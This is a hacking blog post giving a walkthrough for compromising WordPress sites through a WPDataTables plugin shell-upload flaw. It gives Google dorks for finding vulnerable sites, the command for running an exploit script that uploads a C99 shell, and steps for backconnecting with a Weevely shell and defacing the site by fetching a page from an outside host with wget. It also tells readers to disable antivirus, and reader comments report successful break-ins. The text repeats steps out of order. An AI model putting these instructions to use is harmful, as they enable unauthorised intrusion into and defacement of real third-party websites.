Wordpress Working Exploit: WPDataTable Shell Upload Vulnerability and Not Acceptable Bypass
 |
| Wordpress Working Exploit: WPDataTable Shell Upload Vulnerability and Not Acceptable Bypass |
Welcome to HackingHost, a blog which shares selected post from whole internet with you. As we know WordPress is the most popular CMS for website and blog creation. About 75% websites are powered by WordPress on the internet. Recently Our hacker friends have discovers a vulnerability in a WordPress plugin called WPDataTable. Which allow us to upload shell to the website server and hack it.
Shell is php script which is used by hackers to gain access to website server and do various tasks like defacing,rooting, etc. You can download a shell from our website. some shell names are c99,etc. Shell are detected as virus by the antivirus, so turnoff antivirus before downloading.
Lets back to the topic.
Uploading The Shell
Requirements:
- Python (Version 2.7) Click Me to download.
- Exploit Script. Click Me To Download. (Press ctrl+s to save.)
- Shell. (for eg.C99)
Steps:
1:Create a new folder and copy exploit and shell to it.
2:Rename Shell to python executable.
Before:
3:Now lets find the website which can be hacked.
we gonna use a search engine for this like Google.
just search using any of these
4: Open Command Promote/Terminal.
Windows user can press start+r to start run and them type cmd to start command promote.
If shell is uploaded successfully you will get shell url. if not then try another site. I got a working site after 3 Google pages.
If shell is not accessible change the shell name to shell.phpxxx from shell.php
wpdatatables_shell_up.py_.txt
To:
wpdatatables_shell_up.py_.py
3:Now lets find the website which can be hacked.
we gonna use a search engine for this like Google.
just search using any of these
inurl:/plugins/wpdatatablesYou will get many website results we will test them one by one. all websites that are using older version of plugin are hackable.
inurl:codecanyon-3958969
index of "wpdatatables"
index of "codecanyon-3958969"
4: Open Command Promote/Terminal.
Windows user can press start+r to start run and them type cmd to start command promote.
type: cd your folder location in cmd.for eg.
cd c:/hackthen type:
python wpdatatables_shell_up.py -t targetsite.com -f shell.phpwhere targetsite.com is address of your target website. and shell.php is the name of shell we are going to upload. for eg c99.php.
If shell is uploaded successfully you will get shell url. if not then try another site. I got a working site after 3 Google pages.
If shell is not accessible change the shell name to shell.phpxxx from shell.php
Bypassing Not Acceptable
Requirements:
1- Weevely Stealth Shell
2- Remote Deface Script (.txt)
2- Remote Deface Script (.txt)
Steps:
1- Upload weevely stealth shell using the exploit script
2- Backconnect using weevely
3- CD to root directory
4- Backup index.php
mv index.php indexBAK.php
5- Import Deface Script
wget http://yourhosting.com/index.txt -O index.php
2- Backconnect using weevely
3- CD to root directory
4- Backup index.php
mv index.php indexBAK.php
5- Import Deface Script
wget http://yourhosting.com/index.txt -O index.php
exploit credits:homelab.it
Uploading Shell
Uploading Shell
Nice brother it's working. After spending sometime I found some hackable websites. Shell uploaded successfully but on some servers I can't access it. It shows error that I have no permissions to access it. Please help.
ReplyDeletegood work..!!!
ReplyDeleteLatest Software PC | office 365 full crack
Thanks for sharing with us...!!!!!!
ReplyDeleteAndroid Apk Markets